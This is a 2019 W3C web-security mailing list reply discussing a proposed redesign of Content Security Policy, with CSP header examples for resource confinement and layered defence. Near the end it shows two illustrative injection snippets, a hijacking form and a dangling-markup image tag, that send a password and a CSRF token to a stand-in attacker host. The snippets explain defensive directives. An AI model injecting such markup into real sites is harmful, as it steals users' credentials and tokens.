
Re: A modest content security proposal.

From: Craig Francis <craig.francis@gmail.com>
Date: Mon, 15 Jul 2019 13:14:57 +0100
Message-ID: <CALytEkMQ5kfQFS6N7+_yPq4_GmdCRM59QHAzDdbGF67W3BFRMA@mail.gmail.com>
To: Mike West <mkwst@google.com>
Cc: Web Application Security Working Group <public-webappsec@w3.org>

Hi Mike,

Initial thoughts from a web developer, one who really likes CSP...

I like the idea of the browser providing the nonce, and that being used to
white-list scripts - it feels like a good way to prove the website really did
intend to include that script. It also means the browser knows the nonce is
random/unique (though developers should still be careful, since they're
reflecting a value back into their HTML).
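
For comparison, proving intent today means the server generates its own
random nonce per response and echoes it in both the header and the markup -
a minimal sketch (the nonce value here is purely illustrative):

```html
<!-- response header (one random value per response):
     Content-Security-Policy: script-src 'nonce-R4nd0mV4lu3' -->
<script nonce="R4nd0mV4lu3" src="/app.js"></script>
```

A browser-provided nonce would remove the burden of proving that value is
unpredictable and unique.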

And simplifying the process by locking down <base>, <object>, "javascript:"
URLs, etc. should set a good/simpler baseline (where I think "allow"
should be renamed "allow-unsafe", and I would prefer eval to be "block" by
default).
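
For reference, the rough equivalent of that baseline in today's CSP is
something like this (a sketch; the nonce is illustrative):

```http
Content-Security-Policy: base-uri 'none'; object-src 'none'; script-src 'nonce-R4nd0mV4lu3'
```

Under such a policy, "javascript:" URLs and eval are already blocked unless
'unsafe-inline'/'unsafe-eval' are explicitly added - which matches wanting
eval to be "block" by default.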

The bit I feel like I'm missing, and it might be because I enjoy applying
multiple layers of protection, is the *Resource Confinement* side.

On my websites, I have a folder for static resources (`php_admin_flag
engine off`) that's under version control and replaced every time the website
is updated (with a diff check before), and it's not writable by the web
server process (so no user-uploaded/replaced content). I like to ensure
that all JS/CSS/images/fonts are loaded from that safe folder, and I can do
that because the CSP specifies the specific paths that are served from that
locked-down folder.
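
That path-based confinement works in today's CSP because source expressions
ending in "/" match anything under that path - a sketch (the domain and
paths are placeholders, and the header is wrapped here for readability):

```http
Content-Security-Policy: default-src 'none';
  script-src https://www.example.com/static/js/;
  style-src https://www.example.com/static/css/;
  img-src https://www.example.com/static/img/;
  font-src https://www.example.com/static/fonts/
```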

A possible solution would be a second domain, but that would slow the page
load time a little bit, make the server config a bit more complex, and
might lose some restrictions - such as the user-uploaded images folder
containing a malicious JavaScript file (will I need a different domain for
each resource type?).

I also dynamically set the CSP for every page - e.g. most pages are fine with
`connect-src 'none'` (inherited from default-src), but when a page/script
needs to use XMLHttpRequest, I explicitly set the full URL for the one API
it needs to access.
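
As a sketch of that per-page approach (the API URL is a placeholder): most
pages send a policy where connect-src simply falls back to `default-src
'none'`, while the one page that needs XMLHttpRequest sends something like:

```http
Content-Security-Policy: default-src 'none'; connect-src https://api.example.com/v1/search
```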

The intention is to have layers... 1. my server side code shouldn't have
any XSS vulnerabilities; if it does, 2. CSP should stop the loading of
scripts; if that fails (e.g. a legitimate script was replaced by a hacker),
3. that script should be limited in what it can do to that page.

This also applies to limiting what content can be loaded in frames (e.g.
blocking an iframe from showing a malicious login form, which is why I have
frame-src 'none' for most pages).
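
The frame restriction for those pages is just:

```http
Content-Security-Policy: frame-src 'none'
```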

And finally, some DOM messing around (form hijacking and "dangling markup"
injection) can cause issues:

   <!-- an injected <form> appearing first captures the real form's inputs -->
   <form action="https://evil.example.com">
   <form action="./">
      <input name="password" />
   </form>

   <!-- an unclosed src attribute swallows the markup that follows it,
        leaking the CSRF token to the attacker's server -->
   <img src='https://evil.example.com<form action="./"><input name="csrf"
value="abc123" />...' />...
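
For what it's worth, existing directives can partially mitigate those two
examples - form-action stops the hijacked submission, and a tight img-src
stops the dangling-markup exfiltration to an attacker-controlled host
(a sketch; the domain/path are placeholders):

```http
Content-Security-Policy: form-action 'self'; img-src https://www.example.com/static/img/
```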

Maybe introduce Scripting-Policy first; then deprecate the old/unnecessary
parts of CSP, but still keep CSP around with a focus on Resource
Confinement?

Developers can then implement Scripting-Policy as their first job; and when
that's done, add/improve restrictions via CSP?

Craig




On Mon, 15 Jul 2019 at 10:03, Mike West <mkwst@google.com> wrote:

> Hey folks,
>
> As part of a concerted effort to procrastinate on things I actually need
> to get done this week, I sketched out a proposal around an iteration on CSP
> that we've talked about in various venues. TL;DR: Let's break it in half,
> and throw away esoteric junk no one uses. :)
>
> https://github.com/mikewest/csp-next
>
> I'm not sure this is worth anyone spending significant amounts of time on
> at the moment, but it's been in the back of my head for a while, and I
> think it's at least worth discussing, even without concrete plans to
> actually work on it in the near future.
>
> Perhaps it might fuel some TPAC discussion later in the year? WDYT?
>
> -mike
>
Received on Monday, 15 July 2019 12:15:32 UTC
